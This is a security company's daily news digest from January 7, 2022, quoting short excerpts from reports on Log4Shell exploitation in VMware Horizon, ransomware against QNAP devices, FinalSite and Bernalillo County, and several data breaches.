January 7, 2022

Fortify Security Team
Jan 7, 2022

Title: NHS Warns of Hackers Exploiting Log4shell in VMware Horizon
Date Published: January 7, 2022

https://www.bleepingcomputer.com/news/security/nhs-warns-of-hackers-exploiting-log4shell-in-vmware-horizon/

Excerpt: “According to the NHS notice, the actor is leveraging the exploit to achieve remote code execution on vulnerable VMware Horizon deployments on public infrastructure. The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back malicious infrastructure,” explains the alert. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.“

Title: QNAP Warns of Ransomware Targeting Internet-Exposed NAS Devices
Date Published: January 7, 2022

https://www.bleepingcomputer.com/news/security/qnap-warns-of-ransomware-targeting-internet-exposed-nas-devices/

Excerpt: “QNAP has warned customers today to secure Internet-exposed network-attached storage (NAS) devices immediately from ongoing ransomware and brute-force attacks. “QNAP urges all QNAP NAS users to follow the security setting instructions below to ensure the security of QNAP networking devices,” the Taiwanese NAS maker said in a press release issued today. The company warned users to check if their NAS is accessible over the internet by opening the Security Counselor, a built-in security portal for QNAP NAS devices.”

Title: Ransomware Attack Suffered by FinalSite Shuts Down Thousands of Websites
Date Published: January 7, 2022

https://heimdalsecurity.com/blog/ransomware-attack-suffered-by-finalsite-shuts-down-thousands-of-websites/

Excerpt: “FinalSite is a software as a service (SaaS) company that provides K-12 school districts and institutions with website design, hosting, and content management solutions. FinalSite provides solutions for over 8,000 institutions and colleges in 115 countries. Recently, school districts whose websites were hosted by FinalSite discovered that they were no longer accessible or displayed errors. FinalSite did not reveal that they had been attacked at the time, instead stating that they were having error and “performance difficulties” across different services, primarily their Composer content management system.”

Title: Enterprises Worry About Increased Data Risk in Cloud
Date Published: January 6, 2022

https://www.darkreading.com/edge-threat-monitor/enterprises-worry-about-increased-data-risk-in-cloud

Excerpt: “The massive shift to a more distributed work environment and adoption of cloud services to support new business models over the past two years has impacted how enterprises assess cyber-risk and manage cloud vulnerabilities. Respondents to Dark Reading’s 2021 Strategic Security Survey say the shift away from on-premises infrastructures has significantly raised the level of cyber-risk associated with cloud services. When it comes to assessing risk, enterprises may be feeling more optimistic. In the 2020 survey, 31% of respondents said assessing risk was among the biggest information security challenges facing the organization. That figure drops to 24% in the 2021 survey. Similarly, 49% in 2020 named managing complexity as among the biggest challenges, while just 35% say so in the 2021 report.”

Title: Chinese Scientist Pleads Guilty to Stealing US Agricultural Tech
Date Published: January 7, 2022

https://www.zdnet.com/article/chinese-scientist-pleads-guilty-to-stealing-us-agricultural-tech/

Excerpt: “Monsanto and The Climate Corporation developed an online platform for farmers to manage field and yield information in a bid to improve land productivity. One aspect of this technology was an algorithm called the Nutrient Optimizer, which US prosecutors say was considered “a valuable trade secret and their intellectual property.” According to the DoJ, the former employee stole this information “for the purpose of benefiting a foreign government, namely the People’s Republic of China.” In June 2017, Xiang left these companies and boarded a flight back to China a day after. The 44-year-old drew the attention of airport officials who conducted a search — but it was not until later that investigators found copies of the Nutrient Optimizer stored on his electronic devices.”

Title: Thousands of Schools Impacted After IT Provider Hit by Ransomware
Date Published: January 7, 2022

https://www.infosecurity-magazine.com/news/thousands-of-schools-it-provider/

Excerpt: “Finalsite claimed it had uncovered no evidence that data had been stolen as part of the raid but admitted that forensic work was still ongoing. Double extortion involving the threat of leaking stolen data is now the norm for such attacks, according to ransomware experts. According to Coveware, over 80% of attacks in Q3 involved the theft of corporate information alongside file encryption. There’s no sign of exactly how many schools have been impacted by the attack, although a Reddit user claimed around 2,200 might have been disrupted.”

Title: Over 3.7 Million Accounts Were Compromised in the Flexbooker Data Breach
Date Published: January 7, 2022

https://securityaffairs.co/wordpress/126409/data-breach/flexbooker-data-breach.html

Excerpt: “FlexBooker is an online appointment scheduling platform that allows users to schedule appointments and sync employee calendars. The attack was carried out by a group calling themselves Uawrongteam, who published links to archives and files containing IDs, driver’s licenses, photos. The threat actors claim the stolen database contains customer information, including names, emails, phone numbers, hashed passwords, and password salt. The company already notified local authorities and sent a data breach notification to the impacted customers. According to the notification, threat actors compromised the service’s Amazon cloud storage system.”

Title: Night Sky, a New Ransomware Operation in the Threat Landscape
Date Published: January 7, 2021

https://securityaffairs.co/wordpress/126400/malware/night-sky-ransomware-operation.html

Excerpt: “Researchers from MalwareHunterteam first spotted a new ransomware family dubbed Night Sky that implements a double extortion model in attacks aimed at businesses. Once an encrypted file, the ransomware appends the ‘.night sky‘ extension to encrypted file names. The ransomware gang started its operations on December 27, 2021, and has already hacked the corporate networks of two organizations from Bangladesh and Japan respectively. The gang has also set up a leak site on the Tor network where it will publish files stolen to the victims that will not pay the ransom.”

Title: New Mexico’s Bernalillo County Investigates Ransomware Attack
Date Published: January 6, 2021

https://www.darkreading.com/attacks-breaches/new-mexico-s-bernalillo-county-investigates-ransomware-attack

Excerpt: “Bernalillo County is the most populous in New Mexico and includes the cities of Albuquerque, Los Ranchos, and Tijeras. Officials report the disruption likely occurred between midnight and 5:30 a.m. on Jan. 5. They have taken affected systems offline and severed network connections, as well as notified county system vendors, which are working to solve the issue and restore system functionality. While county buildings and offices are closed to the public, employees are working remotely to assist the public, officials wrote in a release. Emergency and public safety services are fully operational, Behavioral Health is operational, and community centers will remain open as scheduled. Its Treasurer’s Office is accepting tax payments through its online portal, through county drop boxes, and at any branch of the Rio Grande Credit Union, officials wrote.”

Title: Threat Actors Stole 1.1 Million Customer Accounts from 17 Well-Known Companies
Date Published: January 6, 2021

https://securityaffairs.co/wordpress/126381/cyber-crime/credential-stuffing-ny-oag-report.html

Excerpt: “After reviewing thousands of posts, the OAG compiled login credentials for customer accounts at 17 well-known companies, which included online retailers, restaurant chains, and food delivery services. In all, the OAG collected credentials for more than 1.1 million customer accounts, all of which appeared to have been compromised in credential stuffing attacks.” reads the report published by NY OAG. “The OAG contacted each of the 17 companies to alert them to the compromised accounts. The OAG also asked the companies to investigate and take steps to protect impacted customers. Every company did so.”

Recent Posts

May 6, 2022

Title: Google Docs Crashes on Seeing "And. And. And. And. And." Date Published: May 6, 2022 https://www.bleepingcomputer.com/news/technology/google-docs-crashes-on-seeing-and-and-and-and-and/ Excerpt: “A bug in Google Docs is causing it to crash when a series of words...

May 5, 2022

Title: Tor Project Upgrades Network Speed Performance with New System Date Published: May 5, 2022 https://www.bleepingcomputer.com/news/security/tor-project-upgrades-network-speed-performance-with-new-system/ Excerpt: “The Tor Project has published details about a...

May 3, 2022

Title: Aruba and Avaya Network Switches are Vulnerable to RCE Attacks Date Published: May 3, 2022 https://www.bleepingcomputer.com/news/security/aruba-and-avaya-network-switches-are-vulnerable-to-rce-attacks/ Excerpt: “Security researchers have discovered five...

May 2, 2022

Title: U.S. DoD Tricked into Paying $23.5 Million to Phishing Actor Date Published: May 2, 2022 https://www.bleepingcomputer.com/news/security/us-dod-tricked-into-paying-235-million-to-phishing-actor/ Excerpt: “The U.S. Department of Justice (DoJ) has announced the...

April 29, 2022

Title: EmoCheck now Detects New 64-bit Versions of Emotet Malware Date Published: April 28, 2022 https://www.bleepingcomputer.com/news/security/emocheck-now-detects-new-64-bit-versions-of-emotet-malware/ Excerpt: “The Japan CERT has released a new version of their...

April 28, 2022

Title: New Bumblebee Malware Takes Over BazarLoader's Ransomware Delivery Date Published: April 28, 2022 https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-takes-over-bazarloaders-ransomware-delivery/ Excerpt: “A newly discovered malware loader...

April 27, 2022

Title: Chinese State-Backed Hackers now Target Russian State Officers Date Published: April 27, 2022 https://www.bleepingcomputer.com/news/security/chinese-state-backed-hackers-now-target-russian-state-officers/ Excerpt: “Security researchers analyzing a phishing...